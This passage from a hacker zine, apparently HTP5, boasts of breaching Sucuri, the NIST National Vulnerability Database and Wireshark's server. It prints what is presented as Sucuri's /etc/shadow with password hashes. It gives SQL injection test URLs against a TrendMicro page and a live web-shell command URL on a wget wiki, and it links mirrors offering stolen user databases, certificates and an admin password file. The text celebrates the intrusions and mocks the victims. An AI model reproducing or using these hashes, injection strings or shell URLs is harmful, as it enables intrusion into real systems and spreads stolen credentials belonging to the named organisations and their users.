  723. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  724.  
  725. lol
  726.  
  727.  
  728.  
  729. ▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄
  730. ██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5
  731. ██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄
  732. ██
  733. ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  734.  
  735. "Sucuri is a company that offers a security service that detects unauthorized
  736. changes to network (cloud) assets, including web sites, DNS, Whois records, SSL
  737. certificates and others. It is also heavily used as an early warning system to
  738. detect Malware, Spam and other security issues on web sites and DNS hijacking."
  739.  
  740. Sucuri, why didn't you announce that you got owned? Pretty useless warning
  741. system, if you ask us.
  742.  
  743. [root@sucuri www]# uname -a
  744. Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
  745. i386 GNU/Linux
  746.  
  747. 2001, here we come
  748. [root@sucuri www]# cat /etc/shadow
  749. root:iFvywDsrRwmjI:15755:0:99999:7:::
  750. bin:*:14746:0:99999:7:::
  751. daemon:*:14746:0:99999:7:::
  752. adm:*:14746:0:99999:7:::
  753. lp:*:14746:0:99999:7:::
  754. sync:*:14746:0:99999:7:::
  755. shutdown:*:14746:0:99999:7:::
  756. halt:*:14746:0:99999:7:::
  757. mail:*:14746:0:99999:7:::
  758. news:*:14746:0:99999:7:::
  759. uucp:*:14746:0:99999:7:::
  760. operator:*:14746:0:99999:7:::
  761. games:*:14746:0:99999:7:::
  762. gopher:*:14746:0:99999:7:::
  763. ftp:*:14746:0:99999:7:::
  764. nobody:*:14746:0:99999:7:::
  765. vcsa:!!:14746:0:99999:7:::
  766. ntp:!!:14746::::::
  767. sshd:!!:14746::::::
  768. dre:mAuUxgVOcOeAE:15678:0:99999:7:::
  769. apache:!!:14898::::::
  770. mysql:!!:14898::::::
  771. mailnull:!!:14946::::::
  772. smmsp:!!:14946::::::
  773. ossec:!!:15461:0:99999:7:::
  774. ^ OSSEC? Here, We're sure you'll get a kick out of this:
  775.  
  776. TrendMicro (owns OSSEC) DB access via SQLi:
  777. http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5
  778. http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4
  779.  
  780. Included in this segment of HTP5 are the databases of Sucuri's primary site,
  781. though labs.sucuri.net and the rest of their VPS's were also compromised.
  782.  
  783. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  784. ~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz
  785. |- 2.1MB | Sucuri WP DB's
  786. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  787. "GREGORY D. EVANS, BABY! NUMBA 1!"
  788.  
  789. ░░░▒▒▒▒░░░░░░░
  790. ░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
  791. ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░
  792. ░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░
  793. ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒
  794. ▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░
  795. ▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒
  796. ▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒
  797. ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
  798. ░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
  799. ▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
  800. ▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
  801. ░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░
  802. ▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░
  803. ▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
  804. ░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒
  805. ░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
  806. ▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░
  807. ▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░
  808. ▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░
  809. ▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░
  810. ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░
  811. ▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒
  812. ▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒
  813. ▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓
  814. ▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒
  815. ▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒
  816. ▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒
  817. ▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒
  818. ▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
  819. ▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████
  820. ▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████
  821. ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████
  822. ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████
  823. ▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████
  824. ▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████
  825. ▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████
  826. ▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████
  827. ▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████
  828. ▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████
  829. ▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████
  830. ▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████
  831. ▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████
  832. ███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████
  833. ███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████
  834. ███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████
  835. ███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████
  836. ███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████
  837. ██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████
  838. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  839.  
  840.  
  841. ▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄
  842. ███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5
  843. ██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀
  844. ██ ▀██ ██ ▀██
  845. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  846.  
  847. GILL
  848. However, we have come to believe that one 'HTP'
  849. is involved in the NVD breach. They or perhaps
  850. an accomplice of theirs have a disk that Mr.
  851. Belford needs. We want you to help us find it.
  852.  
  853. \
  854.  
  855. ░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░
  856. ░▒▓███████████████████▓▒░
  857. ░▒▓█████████████████████████▓▒░
  858. ░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓
  859. ░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓
  860. ░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓
  861. ▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒
  862. ▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██
  863. ▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░
  864. █████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒
  865. ████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓
  866. ███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓
  867. ▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓
  868. ▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░
  869. ▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓
  870. ░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░
  871. ▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒
  872. ░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓
  873. ▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒
  874. ░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓
  875. ░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓
  876. ░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░
  877. ░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░
  878. ▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓
  879. ▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒
  880. ▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓
  881. ▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒
  882. ░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓
  883. ░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓
  884. ░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░
  885. ░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░
  886. ▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░
  887. ▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░
  888. ░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░
  889. ░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒
  890. ░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████
  891. ██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████
  892. ████████████████████████████▒ ▓▓██ ▓██████████████████
  893. █████████████████████████████▒ ████ ░██████████████████
  894. ██████████████████████████████▒ ▀████ ▒█████████████████
  895. ███████████████████████████████▓ █████ █████████████████
  896. ████████████████████████████████▓ ██████ ▒████████████████
  897. █████████████████████████████████▓ ███████ ▓███████████████
  898. ██████████████████████████████████▓░ ████████ ░▓██████████████
  899. ████████████████████████████████████░ ▓████████ ▒██████████████
  900. █████████████████████████████████████░ █████████ ██████████████
  901. ██████████████████████████████████████▒ █████████ ▓█████████████
  902. ███████████████████████████████████████▒ ██████████ ░█████████████
  903. ████████████████████████████████████████▓ ▒██████████ ▓████████████
  904. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  905.  
  906. About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
  907. networks) and came across an individual who was pretty skilled with ColdFusion.
  908. After due time, we invited him/her to HTP. He/she ended up manifesting the NULL
  909. RDS 1day POC, which owned the NVD.
  910.  
  911. The NVD realized they were breached, and deleted the shells. Soon after, they
  912. were shelled again. They deleted the shells again. Once again, they were
  913. shelled. The DHS CSD was swift and unrelenting with their execution of the
  914. DELETE key.
  915.  
  916. As fun as this was, the rest of HTP acknowledged what had been breached. We
  917. switched tactics and proceeded to traverse the National Vulnerability Database
  918. network. Two boxes down, we downloaded the CFM scripts and certificates hosted
  919. within the NVD and NISTWEB servers. From them, we were able to authenticate
  920. ourselves to access the DHS NIST/NVD user database (root slash period workspace
  921. slash period garbage period).
  922.  
  923. Not knowing what to do, and realizing their DELETE key training had abandoned
  924. them, the DHS CSD resorted to shutting the entire site down. It is our theory
  925. their inspiration for this technique came from an NCIS episode:
  926. http://www.youtube.com/watch?v=u8qgehH3kEQ
  927.  
  928. Included in this segment of HTP5 is the DHS NIST/NVD user database, along with
  929. two certificates and their ColdFusion admin password.properties. Enjoy.
  930.  
  931.  
  932. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  933. ~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip
  934. |- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties
  935. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  936.  
  937.  
  938. ███ ███ ▄████ ▄▄████▄▄ ███ ███
  939. ███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███
  940. ███ ███ ▄██▀███ ███ ███ ███ ███
  941. ██████████ ▄██▀ ███ ███ ███▄███ W
  942. ███ ███ ▄██▀ ███ ███ ████████ I
  943. ███ ███ ▄██▀ ███ ███ ███ ███ ████ R
  944. ███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E
  945. ███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S
  946. H
  947. A
  948. _____ R
  949. ███████████ ███ ███ ██████████ ,-:` \;',`'- K
  950. ███ ███ ███ ███ .'-;_,; ':-;_,'.
  951. ███ ███ ███ ███ /; '/ , _`.-\
  952. ███ ██████████ ███████ | '`. (` /` ` \`|
  953. ███ ███ ███ ███ |:. `\`-. \_ / |
  954. ███ ███ ███ ███ | ( `, .`\ ;'|
  955. ███ ███ ███ ███ \ | .' `-'/
  956. ███ ███ ███ ██████████ `. ;/ .'
  957. `'-._____.-'`
  958.  
  959.  
  960. ███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._
  961. ███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-,
  962. ███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '',
  963. ███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '.
  964. ███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '.
  965. ███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \
  966. ███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '.
  967. ███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,'
  968. .._ '/.' . ;
  969. ; `-. , \'
  970. ; `, ; ._\
  971. ; \ _,-' ''--._
  972. : \_,-' '-._
  973. \ ,-' . '-._
  974. .' __.-''; \...,__ '.
  975. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\
  976. / _,--' ; \ ; "^.}
  977. For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ;
  978. / \/ \_.,-' ;
  979. Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ;
  980. were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ;
  981. MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--'
  982. shelled. Would someone please update them? It's been :--`` )/
  983. months by now:
  984.  
  985. http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a
  986.  
  987. We had our sights set on backdooring Mercurial, which
  988. would land us shells on UnrealIRCd (3rd time!), Firefox,
  989. QuakeNet, Pidgin, and Debian repositories. However, we
  990. were more interested in having fun, so instead we dropped
  991. into Wireshark's server.
  992.  
  993. After 24 hours, Wireshark's server 'splash' returned a shell.
  994. It featured a 3.7 kernel and an Apache httpd, which hosted
  995. both the blog and the wiki. Permissions were read-world on
  996. the config files, and we couldn't help ourselves. We then
  997. proceeded to monitor Wireshark's www-data mail, as well as
  998. download their user databases. All of the above is included
  999. in the concluding segment of HTP5. Enjoy your corporate
  1000. security access.
  1001.  
  1002.  
  1003. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1004. ~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip
  1005. |- 1.3MB | 31MB compressed Wireshark data
  1006. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1007.  
  1008.  
  1009. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1010. ▄▄▄▄▄
  1011. █ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5
  1012. █ █ █ █ █ █▄▄█ █ █
  1013. █▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█
  1014. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  1015.  
  1016.  
  1017. We've come a long way since we first showed up on the Scene. Current and past
  1018. crew of Hack The Planet, we appreciate your kickass effort that got us to this
  1019. point. Since our inception, we have unfortunately witnessed a few of our crew
  1020. members getting arrested. To them, we regret what has transpired, and wish you
  1021. all the best beyond HTP.
  1022.  
  1023. This zine, like all of the others, has been a blast to create. Those interested
  1024. can check out http://straylig.ht/ for past releases.
  1025.  
  1026. Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,
  1027. and DDoS Anonymous on sight.
  1028.  
  1029. Hack the Planet!
  1030.  
  1031.  
  1032. Shout Outs To:
  1033. > ACiD (colored ANSI)
  1034.  
  1035.  
  1036.  
  1037. .
  1038. .
  1039. H .
  1040. ░▓▓▓▓▓▓▓▓▓▓▓ . P
  1041. ▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
  1042. ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
  1043. ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
  1044. ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
  1045. ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
  1046. ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
  1047. ▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
  1048. |▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
  1049. ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
  1050. |▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
  1051. \ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
  1052. \ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
  1053. ,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
  1054. ,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
  1055. ▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
  1056. ▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
  1057. ▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
  1058. ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  1059. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
  1060.  
  1061. © Offensive Security 2011
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement